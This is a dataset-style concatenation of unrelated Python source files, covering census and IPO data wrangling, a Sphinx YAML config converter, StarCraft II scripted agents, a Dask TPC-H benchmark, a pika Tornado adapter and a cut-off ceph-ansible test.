df_census_econ.rename(columns={ 'Percent; HEALTH INSURANCE COVERAGE - Civilian noninstitutionalized population - No health insurance coverage': 'Percent of Population with no Health Insurance Coverage'}, inplace=True) df_census_econ.rename(columns={ 'Percent; PERCENTAGE OF FAMILIES AND PEOPLE WHOSE INCOME IN THE PAST 12 MONTHS IS BELOW THE POVERTY LEVEL - All people': 'Percent of People whose Income in the Past 12 months has been Below Poverty Level'}, inplace=True) df_census_econ['l10000'].replace("-", "0.0", regex=True, inplace=True) df_census_econ['l10000'].replace("N", "0.0", regex=True, inplace=True) df_census_econ['l10000'] = df_census_econ['l10000'].astype(float) df_census_econ['l15000'].replace("-", "0.0", regex=True, inplace=True) df_census_econ['l15000'].replace("N", "0.0", regex=True, inplace=True) df_census_econ['l15000'] = df_census_econ['l15000'].astype(float) df_census_econ['l25000'].replace("-", "0.0", regex=True, inplace=True) df_census_econ['l25000'].replace("N", "0.0", regex=True, inplace=True) df_census_econ['l25000'] = df_census_econ['l25000'].astype(float) df_census_econ["Percent of Households With Income Less Than $24,999"] = df_census_econ['l10000'] + df_census_econ[ 'l15000'] + df_census_econ['l25000'] df_census_econ = df_census_econ.filter(census_econ_columns) df_census_dem.rename(columns={'Id2': 'Zipcode'}, inplace=True) df_census_dem.rename(columns={'Estimate; SEX AND AGE - Median age (years)': 'Median Age'}, inplace=True) df_census_dem.rename(columns={'Percent; SEX AND AGE - Under 18 years': 'Percent of People under 18 years of age'}, inplace=True) df_census_dem.rename(columns={'Percent; SEX AND AGE - 65 years and over': 'Percent of People 65 years and over'}, inplace=True) df_census_dem.rename(columns={'Percent; SEX AND AGE - 18 years and over - Male': 'Percent of Males'}, inplace=True) df_census_dem.rename(columns={'Percent; SEX AND AGE - 18 years and over - Female': 'Percent of Females'}, inplace=True) df_census_dem.rename(columns={ 'Percent; HISPANIC OR LATINO AND RACE - Total population - Hispanic or Latino (of any race)': 'Percent of People who are Hispanic'}, inplace=True) df_census_dem.rename(columns={ 'Percent; HISPANIC OR LATINO AND RACE - Total population - Not Hispanic or Latino - White alone': 'Percent of People who are White'}, inplace=True) df_census_dem.rename(columns={ 'Percent; HISPANIC OR LATINO AND RACE - Total population - Not Hispanic or Latino - Black or African American alone': 'Percent of People who are Black or African American'}, inplace=True) df_census_dem.rename(columns={ 'Percent; HISPANIC OR LATINO AND RACE - Total population - Not Hispanic or Latino - Asian alone': 'Percent of People who are Asian'}, inplace=True) df_census_dem = df_census_dem.filter(census_dem_columns) # filter data to only Silicon Valley + San Francisco Zip Codes df_census_dem = df_census_dem[df_census_dem['Zipcode'].isin(zip_list)] df_census_econ = df_census_econ[df_census_econ['Zipcode'].isin(zip_list)] return df_census_econ, df_census_dem def wrangle_real_estate_headers(df): ''' run before joining dataframes so keys match df_sale_counts_by_zip_silicon_valley.columns = df_sale_counts_by_zip_silicon_valley.columns.str.replace('Sales Counts ', '') df_sale_counts_by_zip_silicon_valley = df_sale_counts_by_zip_silicon_valley.add_prefix('Sales Counts ') df_sale_counts_by_zip_silicon_valley.rename(columns = {'Sales Counts RegionName':'Zipcode'}, inplace=True) ''' df.columns = df.columns.str.replace('All Homes ', '') df = df.add_prefix('All Homes ') df.rename(columns={'All Homes RegionName': 'Zipcode'}, inplace=True) return df def wrangle_ipo_headers(df): df.rename(columns={'Ticker': 'Symbol'}, inplace=True) df["Found"] = df["Found"].astype(dtype=np.int64) return df def join_data(df1, df2, key, join_type): df = df1.set_index(key).merge(df2, on=key, how=join_type) return df def merge_data(df1, df2, key): df = pd.merge(df1, df2, on=key, how='inner') return df def df_replace(df, replace_list): for i in range(0, len(replace_list)): df = df.replace([replace_list[i]], [''], regex=True) return df def drop_columns_and_nans(df, drop_columns, nan_columns): df = df.drop(['IPO Name', 'Offer date', 'CUSIP', 'PERM'], axis=1) for i in range(0, len(nan_columns)): df.drop_duplicates(subset=nan_columns[i], keep='first', inplace=True) return df def calculate_distance_between_zips(zipcode, min_radius, max_radius): # api-endpoint URL_base = "https://api.zip-codes.com/ZipCodesAPI.svc/1.0/FindZipCodesInRadius?zipcode=" URL = URL_base + zipcode + '&minimumradius=' + min_radius + '&maximumradius=' + max_radius + '&key=<KEY>' # sending get request and saving the response as response object contents = urllib.request.urlopen(URL).read() # printing the output zipcodes_nearby = [] print(json.loads(contents)) for i in range(1, len(json.loads(contents)['DataList'])): zipcodes_nearby.append(json.loads(contents)['DataList'][i]['Code']) return zipcodes_nearby def create_zipcode_distances_dictionary(zipcodes, zip_list): ''' ***DONT RUN IF THESE ARE ALREADY CREATED*** currently stored as data/processed/zipcodes_within_radius.txt ''' print(len(zip_list)) for i in range(0, len(zip_list)): zipcodes[zip_list[i]] = calculate_distance_between_zips(zip_list[i], '0', '5'), calculate_distance_between_zips( zip_list[i], '5', '10') return zipcodes def create_text_file_from_dictionary(filename, dictionary): ''' with open('data/processed/zipcodes_within_radius.txt', 'w') as json_file: json.dump(zipcodes, json_file) ''' with open(filename, 'w') as json_file: json.dump(dictionary, json_file) return dictionary def export_dataframe_to_dictionary(df, name): filename = 'data/processed/' + name + '.csv' export_csv = df.to_csv(filename, index=True, header=True) # Don't forget to add '.csv' at the end of the path def update_zipcodes_dict(zipcodes, zip_list): exists = os.path.isfile('../data/processed/zipcodes_within_radius.txt') if not exists: zipcodes = create_zipcode_distances_dictionary(zipcodes, zip_list) create_text_file_from_dictionary('../data/processed/zipcodes_within_radius.txt', zipcodes) else: zipcodes = {} with open('../data/processed/zipcodes_within_radius.txt', 'r') as f: zipcodes = json.load(f) return zipcodes def create_IPO_an_Zipcode_dataframe(census_econ_cols, census_dem_cols, df_ipo, df_zip, zipcodes): if 'Zipcode' in census_econ_cols: census_econ_cols.remove('Zipcode') if 'Zipcode' in census_dem_cols: census_dem_cols.remove('Zipcode') ipo_header_list = list(df_ipo.columns.values) +census_dem_cols+census_econ_cols + ['All Homes Date Filed', 'All Homes Lockup Expiration Date', 'All Homes 1 Year Before Date Filed', 'All Homes 2 Years After Date Filed'] ''' Distance from IPO = estimate is .2 if in the same zipcode as IPO = estimate is 0.5 if not in same zip code as IPO and less than 5 miles from zipcode to IPO = estimate is 1 if greater than 5 and less than 10 miles from zipcode to IPO ''' new_df_list = [] for index, row in df_ipo.iterrows(): ipo_zipcode = str(row['Zipcode']) zipcode_row = df_zip.loc[df_zip['Zipcode'] == int(ipo_zipcode)] headerList = join_IPO_and_Zip_Data(row['Date Filed'], row['Lockup Expiration Date'], census_econ_cols,census_dem_cols) data = np.concatenate((np.array(row.values), zipcode_row.filter(headerList).values), axis=None) dictionary = dict(zip(ipo_header_list, data)) dictionary['Symbol'] = index dictionary['Distance to IPO'] = .2 dictionary['Zipcode for Distance'] = ipo_zipcode new_df_list.append(dictionary) within_5miles = zipcodes[ipo_zipcode][0] within_10miles = zipcodes[ipo_zipcode][1] for i in range(0, len(within_5miles)): zipcode_row = df_zip.loc[df_zip['Zipcode'] == int(within_5miles[i])] data = np.concatenate((np.array(row.values), zipcode_row.filter(headerList).values), axis=None) dictionary = dict(zip(ipo_header_list, data)) dictionary['Symbol'] = index dictionary['Distance to IPO'] = .5 dictionary['Zipcode for Distance'] = within_5miles[i] new_df_list.append(dictionary) for j in range(0, len(within_10miles)): zipcode_row = df_zip.loc[df_zip['Zipcode'] == int(within_10miles[j])] data = np.concatenate((np.array(row.values), zipcode_row.filter(headerList).values), axis=None) dictionary = dict(zip(ipo_header_list, data)) dictionary['Symbol'] = index dictionary['Distance to IPO'] = 1 dictionary['Zipcode for Distance'] = within_10miles[j] new_df_list.append(dictionary) ipo_final_df = pd.DataFrame(new_df_list) ipo_final_df.dropna(subset=['Median Age'], how='all', inplace=True) ipo_final_df.dropna(subset=['All Homes Date Filed'], how='all', inplace=True) return ipo_final_df def normalize_IPO_an_Zipcode_dataframe(normalization_list, df_ipo): df_ipo = df_ipo.replace(['--'], [''], regex=True) df_ipo = df_ipo.replace(r'^\s*$', np.nan, regex=True) df_ipo = df_ipo.replace(['\,'], [''], regex=True) df_ipo = df_ipo.replace(['\+'], [''], regex=True) scaler = MinMaxScaler() df_ipo[normalization_list] = scaler.fit_transform(df_ipo[normalization_list]) return df_ipo def join_IPO_and_Zip_Data(IPO_Date_Filed, IPO_Lockup_Expiration_Date, census_econ_cols, census_dem_cols): filtered_columns = census_dem_cols +census_econ_cols # remove 'zipcode' ipo_month_filed = IPO_Date_Filed.month ipo_year_filed = IPO_Date_Filed.year AllHomes_header_filed = 'All Homes ' + str(ipo_year_filed) + '-' + str(ipo_month_filed).zfill(2) ipo_month = IPO_Lockup_Expiration_Date.month ipo_year = IPO_Lockup_Expiration_Date.year AllHomes_header_lockup = 'All Homes ' + str(ipo_year) + '-' + str(ipo_month).zfill(2) AllHomes_header_filed_1_yr_ago = 'All Homes ' + str(int(ipo_year_filed) - 1) + '-' + str(ipo_month_filed).zfill(2) AllHomes_header_filed_2_yr = 'All Homes ' + str(int(ipo_year_filed) + 2) + '-' + str(ipo_month_filed).zfill(2) filtered_columns = filtered_columns + [AllHomes_header_filed, AllHomes_header_lockup, AllHomes_header_filed_1_yr_ago, AllHomes_header_filed_2_yr] return filtered_columns def update_ipo_list(year, start_month, end_month): web_scrapers.add_new_ipo_data_to_csv('../data/processed/1997-04_2019_full_ipo_data.csv', year, start_month, end_month) df_ipo_list = load_data(['../data/processed/1997-04_2019_full_ipo_data.csv', '../data/raw/ipo_ritter_data.csv']) zipcodes, zip_list = create_zipcode_list( ['../data/raw/Santa_Clara_County_Zipcodes.csv', '../data/raw/San_Mateo_County_Zipcodes.csv', '../data/raw/San_Francisco_County_Zipcodes.csv', '../data/raw/Alameda_County_Zipcodes.csv']) df_ipo = wrangle_IPO_data(df_ipo_list[0], zip_list) df_ipo_ritter = wrangle_ipo_headers(df_ipo_list[1]) df_ipo = join_data(df_ipo, df_ipo_ritter, 'Symbol', 'left') df_ipo = drop_columns_and_nans(df_ipo, ['IPO Name', 'Offer date', 'CUSIP', 'PERM'], ['CIK']) df_ipo.to_csv("../data/processed/df_ipo.csv", index=True) def main(): df_real_estate = load_real_estate_data('../data/raw/Zip_Zhvi_AllHomes.csv', 'State', 'CA') # data processing to load all IPO Data between 1997 and present data. This data has been scraped using code from src/web_scrapers.py df_ipo_list = load_data(['../data/processed/df_ipo.csv', '../data/raw/ipo_ritter_data.csv']) df_census_list = load_data(['../data/raw/zip_census_bureau_economic_characteristics_2017.csv', '../data/raw/zip_census_bureau_age_race_2017.csv']) zipcodes, zip_list = create_zipcode_list( ['../data/raw/Santa_Clara_County_Zipcodes.csv', '../data/raw/San_Mateo_County_Zipcodes.csv', '../data/raw/San_Francisco_County_Zipcodes.csv', '../data/raw/Alameda_County_Zipcodes.csv']) df_real_estate = wrangle_real_estate_data(df_real_estate, zip_list,['City', 'State', 'Metro', 'CountyName', 'SizeRank']) df_ipo = wrangle_IPO_data(df_ipo_list[0], zip_list) census_econ_columns = ['Zipcode', 'Unemployment Rate', 'Mean Travel Time to Work Estimate (minutes)', 'Percent of Households with Income Greater than $200,000', 'Median Household Income Estimate (dollars)', 'Mean Household Income Estimate (dollars)', 'Per Capita Income Estimate (dollars)', 'Percent of Population with no Health Insurance Coverage', 'Percent of People whose Income in the Past 12 months has been Below Poverty Level', 'Percent of Households With Income Less Than $24,999'] census_dem_columns = ['Zipcode', 'Median Age', 'Percent of People under 18 years of age', 'Percent of People 65 years and over', 'Percent of Males', 'Percent of Females', 'Percent of People who are Hispanic', 'Percent of People who are White', 'Percent of People who are Black or African American', 'Percent of People who are Asian'] df_census_econ, df_census_dem = wrangle_census_data(df_census_list[0], df_census_list[1], zip_list, census_econ_columns, census_dem_columns) df_real_estate = wrangle_real_estate_headers(df_real_estate) df_ipo_ritter = wrangle_ipo_headers(df_ipo_list[1]) df_ipo_ritter = df_ipo_ritter.drop(['Found'], axis=1) df_census = join_data(df_census_econ, df_census_dem, 'Zipcode', 'inner') df_zip = merge_data(df_census, df_real_estate, 'Zipcode') df_zip = df_replace(df_zip, ['\+', '\,']) print(df_zip['All Homes 2019-05']) df_ipo = join_data(df_ipo, df_ipo_ritter, 'Symbol', 'left') df_ipo = drop_columns_and_nans(df_ipo, ['IPO Name', 'Offer date', 'CUSIP', 'PERM'], ['CIK']) df_ipo['Found'] = 2019.0 - df_ipo['Found'] normalization_list = ['Offer Amount', 'Number of Employees', 'Found', 'Median Age', 'Percent of People under 18 years of age', 'Percent of People 65 years and over', 'Percent of Males', 'Percent of Females', 'Percent of People who are Hispanic', 'Percent of People who are White', 'Percent of People who are Black or African American', 'Percent of People who are Asian', 'Unemployment Rate', 'Mean Travel Time to Work Estimate (minutes)', 'Percent of Households with Income Greater than $200,000', 'Median Household Income Estimate (dollars)', 'Mean Household Income Estimate (dollars)', 'Per Capita Income Estimate (dollars)', 'Percent of Population with no Health Insurance Coverage', 'Percent of People whose Income in the Past 12 months has been Below Poverty Level', 'Percent of Households With Income Less Than $24,999'] zipcodes = update_zipcodes_dict(zipcodes, zip_list) df_ipo_all = create_IPO_an_Zipcode_dataframe(census_econ_columns, census_dem_columns, df_ipo, df_zip, zipcodes) df_ipo_all.to_csv("../data/processed/df_ipo_all.csv", index=False) if __name__ == "__main__": print("we are wrangling data") #update_ipo_list(2019, 6, 7) main()
2.96875
3
src/python/director/builtin/plugins/measurement_tool/plugin.py
afdaniele/director
0
11861
from director.devel.plugin import GenericPlugin from director.fieldcontainer import FieldContainer from .lib import measurementpanel from PythonQt import QtCore class Plugin(GenericPlugin): ID = 'measurement_tool' NAME = 'MeasurementTool' DEPENDENCIES = ['MainWindow'] def __init__(self, app, view): super(Plugin, self).__init__(app, view) def init(self, fields): measurementPanel = measurementpanel.MeasurementPanel(self.app, self.view) measurementDock = self.app.addWidgetToDock( measurementPanel.widget, QtCore.Qt.RightDockWidgetArea, visible=False ) # --- return FieldContainer( measurementToolPanel=measurementPanel, measurementToolDock=measurementDock )
1.945313
2
jupyter_book/yaml.py
akhmerov/jupyter-book
1
11862
<gh_stars>1-10 """A small sphinx extension to let you configure a site with YAML metadata.""" from pathlib import Path # Transform a "Jupyter Book" YAML configuration file into a Sphinx configuration file. # This is so that we can choose more user-friendly words for things than Sphinx uses. # e.g., 'logo' instead of 'html_logo'. # Note that this should only be used for **top level** keys. PATH_YAML_DEFAULT = Path(__file__).parent.joinpath("default_config.yml") def yaml_to_sphinx(yaml): """Convert a Jupyter Book style config structure into a Sphinx config dict.""" sphinx_config = { "exclude_patterns": [ "_build", "Thumbs.db", ".DS_Store", "**.ipynb_checkpoints", ], } # Start with an empty options block theme_options = {} # Launch button configuration launch_buttons_config = yaml.get("launch_buttons", {}) repository_config = yaml.get("repository", {}) theme_options["launch_buttons"] = launch_buttons_config theme_options["path_to_docs"] = repository_config.get("path_to_book", "") theme_options["repository_url"] = repository_config.get("url", "") theme_options["repository_branch"] = repository_config.get("branch", "") # HTML html = yaml.get("html") if html: sphinx_config["html_favicon"] = html.get("favicon", "") sphinx_config["html_baseurl"] = html.get("baseurl", "") theme_options["google_analytics_id"] = html.get("google_analytics_id", "") # Deprecate navbar_footer_text after a release cycle theme_options["navbar_footer_text"] = html.get("navbar_footer_text", "") theme_options["extra_navbar"] = html.get("extra_navbar", "") theme_options["extra_footer"] = html.get("extra_footer", "") theme_options["home_page_in_toc"] = html.get("home_page_in_navbar") # Comments config sphinx_config["comments_config"] = html.get("comments", {}) # Pass through the buttons btns = ["use_repository_button", "use_edit_page_button", "use_issues_button"] use_buttons = {btn: html.get(btn) for btn in btns if html.get(btn) is not None} if any(use_buttons.values()): if not repository_config.get("url"): raise ValueError( "To use 'repository' buttons, you must specify the repository URL" ) # Update our config theme_options.update(use_buttons) # Update the theme options in the main config sphinx_config["html_theme_options"] = theme_options execute = yaml.get("execute") if execute: if execute.get("execute_notebooks") is False: # Special case because YAML treats `off` as "False". execute["execute_notebooks"] = "off" sphinx_config["jupyter_execute_notebooks"] = execute.get( "execute_notebooks", "auto" ) sphinx_config["execution_timeout"] = execute.get("timeout", 30) sphinx_config["jupyter_cache"] = execute.get("cache", "") _recursive_update( sphinx_config, {"execution_excludepatterns": execute.get("exclude_patterns", [])}, ) # LaTeX latex = yaml.get("latex") if latex: sphinx_config["latex_engine"] = latex.get("latex_engine", "pdflatex") # Extra extensions extra_extensions = yaml.get("sphinx", {}).get("extra_extensions") if extra_extensions: if not isinstance(extra_extensions, list): extra_extensions = [extra_extensions] extensions = sphinx_config.get("extensions", []) for extra in extra_extensions: extensions.append(extra) sphinx_config["extensions"] = extensions # Files that we wish to skip sphinx_config["exclude_patterns"].extend(yaml.get("exclude_patterns", [])) # Now do simple top-level translations YAML_TRANSLATIONS = { "logo": "html_logo", "title": "html_title", "execute_notebooks": "jupyter_execute_notebooks", "project": "project", "author": "author", "copyright": "copyright", } for key, newkey in YAML_TRANSLATIONS.items(): if key in yaml: val = yaml.get(key) if val is None: val = "" sphinx_config[newkey] = val return sphinx_config def _recursive_update(config, update): """Update the dict `config` with `update` recursively. This *updates* nested dicts / lists instead of replacing them. """ for key, val in update.items(): if isinstance(config.get(key), dict): config[key].update(val) elif isinstance(config.get(key), list): if isinstance(val, list): config[key].extend(val) else: config[key] = val else: config[key] = val
2.609375
3
ScriptedAgent.py
RaphaelRoyerRivard/Supervised-End-to-end-Weight-sharing-for-StarCraft-II
0
11863
__author__ = '<NAME> - www.tonybeltramelli.com' # scripted agents taken from PySC2, credits to DeepMind # https://github.com/deepmind/pysc2/blob/master/pysc2/agents/scripted_agent.py import numpy as np import uuid from pysc2.agents import base_agent from pysc2.lib import actions from pysc2.lib import features _SCREEN_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index _SCREEN_SELECTED = features.SCREEN_FEATURES.selected.index _PLAYER_FRIENDLY = 1 _PLAYER_NEUTRAL = 3 _PLAYER_HOSTILE = 4 _NO_OP = actions.FUNCTIONS.no_op.id _MOVE_SCREEN = actions.FUNCTIONS.Move_screen.id _ATTACK_SCREEN = actions.FUNCTIONS.Attack_screen.id _SELECT_ARMY = actions.FUNCTIONS.select_army.id _NOT_QUEUED = [0] _SELECT_ALL = [0] class ScriptedAgent(base_agent.BaseAgent): def step(self, obs): super(ScriptedAgent, self).step(obs) # we expand dims because keras wants 4 dims for convolutions # observation = np.expand_dims(obs.observation["screen"][_SCREEN_PLAYER_RELATIVE], axis=3) screens = [obs.observation["screen"][_SCREEN_PLAYER_RELATIVE], obs.observation["screen"][_SCREEN_SELECTED]] observation = np.stack(screens, axis=2) if self.game == "beacon": if actions.FUNCTIONS.Move_screen.id in obs.observation["available_actions"]: player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE] neutral_y, neutral_x = (player_relative == 3).nonzero() if not neutral_y.any(): action = _NO_OP params = [] else: target = [int(neutral_x.mean()), int(neutral_y.mean())] action = _MOVE_SCREEN params = [[0], target] else: action = _SELECT_ARMY params = [[0]] elif self.game == "mineral": if actions.FUNCTIONS.Move_screen.id in obs.observation["available_actions"]: player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE] neutral_y, neutral_x = (player_relative == 3).nonzero() player_y, player_x = (player_relative == 1).nonzero() if not neutral_y.any() or not player_y.any(): action = _NO_OP params = [] else: action = _MOVE_SCREEN index_x = np.argmin(neutral_x) index_y = np.argmin(neutral_y) index = index_x if neutral_x[index_x] + neutral_y[index_x] < neutral_x[index_y] + neutral_y[index_y] else index_y target = [neutral_x[index], neutral_y[index]] params = [[0], target] else: action = _SELECT_ARMY params = [[0]] elif self.game == "minerals": if actions.FUNCTIONS.Move_screen.id in obs.observation["available_actions"]: player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE] neutral_y, neutral_x = (player_relative == 3).nonzero() player_y, player_x = (player_relative == 1).nonzero() if not neutral_y.any() or not player_y.any(): action = _NO_OP params = [] else: player = [int(player_x.mean()), int(player_y.mean())] closest, min_dist = None, None for p in zip(neutral_x, neutral_y): dist = np.linalg.norm(np.array(player) - np.array(p)) if not min_dist or dist < min_dist: closest, min_dist = p, dist action = _MOVE_SCREEN params = [[0], closest] else: action = _SELECT_ARMY params = [[0]] elif self.game == "roaches": if _ATTACK_SCREEN in obs.observation["available_actions"]: player_relative = obs.observation["screen"][_SCREEN_PLAYER_RELATIVE] roach_y, roach_x = (player_relative == _PLAYER_HOSTILE).nonzero() if not roach_y.any(): action = _NO_OP params = [_NOT_QUEUED] else: index = np.argmax(roach_y) target = [roach_x[index], roach_y[index]] action = _ATTACK_SCREEN params = [_NOT_QUEUED, target] elif _SELECT_ARMY in obs.observation["available_actions"]: action = _SELECT_ARMY params = [_SELECT_ALL] else: action = _NO_OP params = [_NOT_QUEUED] self.states.append(np.array([observation, obs.observation["available_actions"], action, params])) if len(self.states) == 64: new_file_name = str(uuid.uuid1()) np.save("dataset_{}/{}".format(self.game, new_file_name), np.array(self.states)) self.states = [] return actions.FunctionCall(action, params) class AgentRoaches(ScriptedAgent): def __init__(self): base_agent.BaseAgent.__init__(self) self.game = "roaches" self.states = [] class AgentBeacon(ScriptedAgent): def __init__(self): base_agent.BaseAgent.__init__(self) self.game = "beacon" self.states = [] class AgentMineral(ScriptedAgent): def __init__(self): base_agent.BaseAgent.__init__(self) self.game = "mineral" self.states = [] class AgentMinerals(ScriptedAgent): def __init__(self): base_agent.BaseAgent.__init__(self) self.game = "minerals" self.states = []
2.46875
2
benchmark/test_tpch.py
serverless-analytics/dask-distributed-vanilla
0
11864
import time import sys import dask from dask.distributed import ( wait, futures_of, Client, ) from tpch import loaddata, queries #from benchmarks import utils # Paths or URLs to the TPC-H tables. #table_paths = { # 'CUSTOMER': 'hdfs://bu-23-115:9000/tpch/customer.tbl', # 'LINEITEM': 'hdfs://bu-23-115:9000/tpch/lineitem.tbl', # 'NATION': 'hdfs://bu-23-115:9000/tpch/nation.tbl', # 'ORDERS': 'hdfs://bu-23-115:9000/tpch/orders.tbl', # 'PART': 'hdfs://bu-23-115:9000/tpch/part.tbl', # 'PARTSUPP': 'hdfs://bu-23-115:9000/tpch/partsupp.tbl', # 'REGION': 'hdfs://bu-23-115:9000/tpch/region.tbl', # 'SUPPLIER': 'hdfs://bu-23-115:9000/tpch/supplier.tbl', #} table_paths = { 'CUSTOMER': '/root/2g/customer.tbl', 'LINEITEM': '/root/2g/lineitem.tbl', 'NATION': '/root/2g/nation.tbl', 'ORDERS': '/root/2g/orders.tbl', 'PART': '/root/2g/part.tbl', 'PARTSUPP': '/root/2g/partsupp.tbl', 'REGION': '/root/2g/region.tbl', 'SUPPLIER': '/root/2g/supplier.tbl', } #table_paths = { # 'CUSTOMER': 'https://gochaudhstorage001.blob.core.windows.net/tpch/customer.tbl', # 'LINEITEM': 'https://gochaudhstorage001.blob.core.windows.net/tpch/lineitem.tbl', # 'NATION': 'https://gochaudhstorage001.blob.core.windows.net/tpch/nation.tbl', # 'ORDERS': 'https://gochaudhstorage001.blob.core.windows.net/tpch/orders.tbl', # 'PART': 'https://gochaudhstorage001.blob.core.windows.net/tpch/part.tbl', # 'PARTSUPP': 'https://gochaudhstorage001.blob.core.windows.net/tpch/partsupp.tbl', # 'REGION': 'https://gochaudhstorage001.blob.core.windows.net/tpch/region.tbl', # 'SUPPLIER': 'https://gochaudhstorage001.blob.core.windows.net/tpch/supplier.tbl', #} def main(): if len(sys.argv) < 2: print("args: <dask client>") return 1 client = Client(sys.argv[1]) timing_supported = False # set to False if running against upstream dask without our code changes. benchmarker = TpchBenchmarkManager(client, timing_supported) benchmarker.load_tables( part_path = table_paths['PART'], supplier_path = table_paths['SUPPLIER'], partsupp_path = table_paths['PARTSUPP'], customer_path = table_paths['CUSTOMER'], orders_path = table_paths['ORDERS'], lineitem_path = table_paths['LINEITEM'], nation_path = table_paths['NATION'], region_path = table_paths['REGION'], ) # Choose what queries you want to run here. benchmarker.run_query(1) #benchmarker.run_query(3) #benchmarker.run_query(6) #benchmarker.run_query(21) class TpchBenchmarkManager: def __init__(self, client, timing_supported=True): self.client = client self.timing_supported = timing_supported self.tables = {} def load_tables(self, *, # Paths/URLs for TPCH tables source data. part_path=None, supplier_path=None, partsupp_path=None, customer_path=None, orders_path=None, lineitem_path=None, nation_path=None, region_path=None, ): paths = { 'PART': part_path, 'SUPPLIER': supplier_path, 'PARTSUPP': partsupp_path, 'CUSTOMER': customer_path, 'ORDERS': orders_path, 'LINEITEM': lineitem_path, 'NATION': nation_path, 'REGION': region_path, } for tablename, path in paths.items(): if path is None: print("\nNo path given for table {}. Skipping.".format(tablename)) continue print("\n====================================") print("Ingesting table {}... \n(from {})".format(tablename, path)) load_start = time.time() table = loaddata.loader[tablename](path) #table = self.client.persist(table) #wait(table) load_duration = time.time() - load_start self.tables[tablename] = table futures = futures_of(table) print("...complete.") print("\nE2E time: {:.3f} seconds. Number of partitions: {}".format( load_duration, len(futures))) print("====================================\n") if self.timing_supported: longest_future = None longest_future_duration = None for future in futures: duration = self.client.timing_info(future)[0]['duration'] if longest_future is None or duration > longest_future_duration: longest_future = future longest_future_duration = duration print("Profile of slowest partition:") #utils.prettyprint_timing_info(self.client.timing_info(longest_future)) def run_query(self, query_num): print("\n====================================") print("Executing query {}...".format(query_num)) query_start = time.time() futures = queries.by_number[query_num](self.tables) future = self.client.compute(futures) result = self.client.gather(future) query_duration = time.time() - query_start print("...complete.") print("\nE2E time: {:.3f} seconds.".format(query_duration)) if self.timing_supported: try: utils.prettyprint_timing_info(self.client.timing_info(future)) except Exception as e: print(str(e)) print(result) return future if __name__ == '__main__': main()
2.046875
2
pika/adapters/tornado_connection.py
hugovk/pika
1
11865
"""Use pika with the Tornado IOLoop """ import logging from tornado import ioloop from pika.adapters.utils import nbio_interface, selector_ioloop_adapter from pika.adapters import base_connection LOGGER = logging.getLogger(__name__) class TornadoConnection(base_connection.BaseConnection): """The TornadoConnection runs on the Tornado IOLoop. """ def __init__(self, parameters=None, on_open_callback=None, on_open_error_callback=None, on_close_callback=None, custom_ioloop=None, internal_connection_workflow=True): """Create a new instance of the TornadoConnection class, connecting to RabbitMQ automatically :param pika.connection.Parameters parameters: Connection parameters :param on_open_callback: The method to call when the connection is open :type on_open_callback: method :param None | method on_open_error_callback: Called if the connection can't be established or connection establishment is interrupted by `Connection.close()`: on_open_error_callback(Connection, exception). :param None | method on_close_callback: Called when a previously fully open connection is closed: `on_close_callback(Connection, exception)`, where `exception` is either an instance of `exceptions.ConnectionClosed` if closed by user or broker or exception of another type that describes the cause of connection failure. :param None | ioloop.IOLoop | nbio_interface.AbstractIOServices custom_ioloop: Override using the global IOLoop in Tornado :param bool internal_connection_workflow: True for autonomous connection establishment which is default; False for externally-managed connection workflow via the `create_connection()` factory. """ if isinstance(custom_ioloop, nbio_interface.AbstractIOServices): nbio = custom_ioloop else: nbio = ( selector_ioloop_adapter.SelectorIOServicesAdapter( custom_ioloop or ioloop.IOLoop.instance())) super(TornadoConnection, self).__init__( parameters, on_open_callback, on_open_error_callback, on_close_callback, nbio, internal_connection_workflow=internal_connection_workflow) @classmethod def create_connection(cls, connection_configs, on_done, custom_ioloop=None, workflow=None): """Implement :py:classmethod:`pika.adapters.BaseConnection.create_connection()`. """ nbio = selector_ioloop_adapter.SelectorIOServicesAdapter( custom_ioloop or ioloop.IOLoop.instance()) def connection_factory(params): """Connection factory.""" if params is None: raise ValueError('Expected pika.connection.Parameters ' 'instance, but got None in params arg.') return cls( parameters=params, custom_ioloop=nbio, internal_connection_workflow=False) return cls._start_connection_workflow( connection_configs=connection_configs, connection_factory=connection_factory, nbio=nbio, workflow=workflow, on_done=on_done)
2.484375
2
tests/library/test_ceph_volume_simple_activate.py
u-kosmonaft-u/ceph-ansible
1,570
11866
from mock.mock import patch import os import pytest import ca_test_common import ceph_volume_simple_activate fake_cluster = 'ceph' fake_container_binary = 'podman' fake_container_image = 'quay.ceph.io/ceph/daemon:latest' fake_id = '42' fake_uuid = '0c4a7eca-0c2a-4c12-beff-08a80f064c52' fake_path = '/etc/ceph/osd/{}-{}.json'.format(fake_id, fake_uuid) class TestCephVolumeSimpleActivateModule(object): @patch('ansible.module_utils.basic.AnsibleModule.exit_json') def test_with_check_mode(self, m_exit_json): ca_test_common.set_module_args({ 'osd_id': fake_id, 'osd_fsid': fake_uuid, '_ansible_check_mode': True }) m_exit_json.side_effect = ca_test_common.exit_json with pytest.raises(ca_test_common.AnsibleExitJson) as result: ceph_volume_simple_activate.main() result = result.value.args[0] assert not result['changed'] assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid] assert result['rc'] == 0 assert not result['stdout'] assert not result['stderr'] @patch('ansible.module_utils.basic.AnsibleModule.exit_json') @patch('ansible.module_utils.basic.AnsibleModule.run_command') def test_with_failure(self, m_run_command, m_exit_json): ca_test_common.set_module_args({ 'osd_id': fake_id, 'osd_fsid': fake_uuid }) m_exit_json.side_effect = ca_test_common.exit_json stdout = '' stderr = 'error' rc = 2 m_run_command.return_value = rc, stdout, stderr with pytest.raises(ca_test_common.AnsibleExitJson) as result: ceph_volume_simple_activate.main() result = result.value.args[0] assert result['changed'] assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 'activate', fake_id, fake_uuid] assert result['rc'] == rc assert result['stderr'] == stderr @patch('ansible.module_utils.basic.AnsibleModule.exit_json') @patch('ansible.module_utils.basic.AnsibleModule.run_command') def test_activate_all_osds(self, m_run_command, m_exit_json): ca_test_common.set_module_args({ 'osd_all': True }) m_exit_json.side_effect = ca_test_common.exit_json stdout = '' stderr = '' rc = 0 m_run_command.return_value = rc, stdout, stderr with pytest.raises(ca_test_common.AnsibleExitJson) as result: ceph_volume_simple_activate.main() result = result.value.args[0] assert result['changed'] assert result['cmd'] == ['ceph-volume', '--cluster', fake_cluster, 'simple', 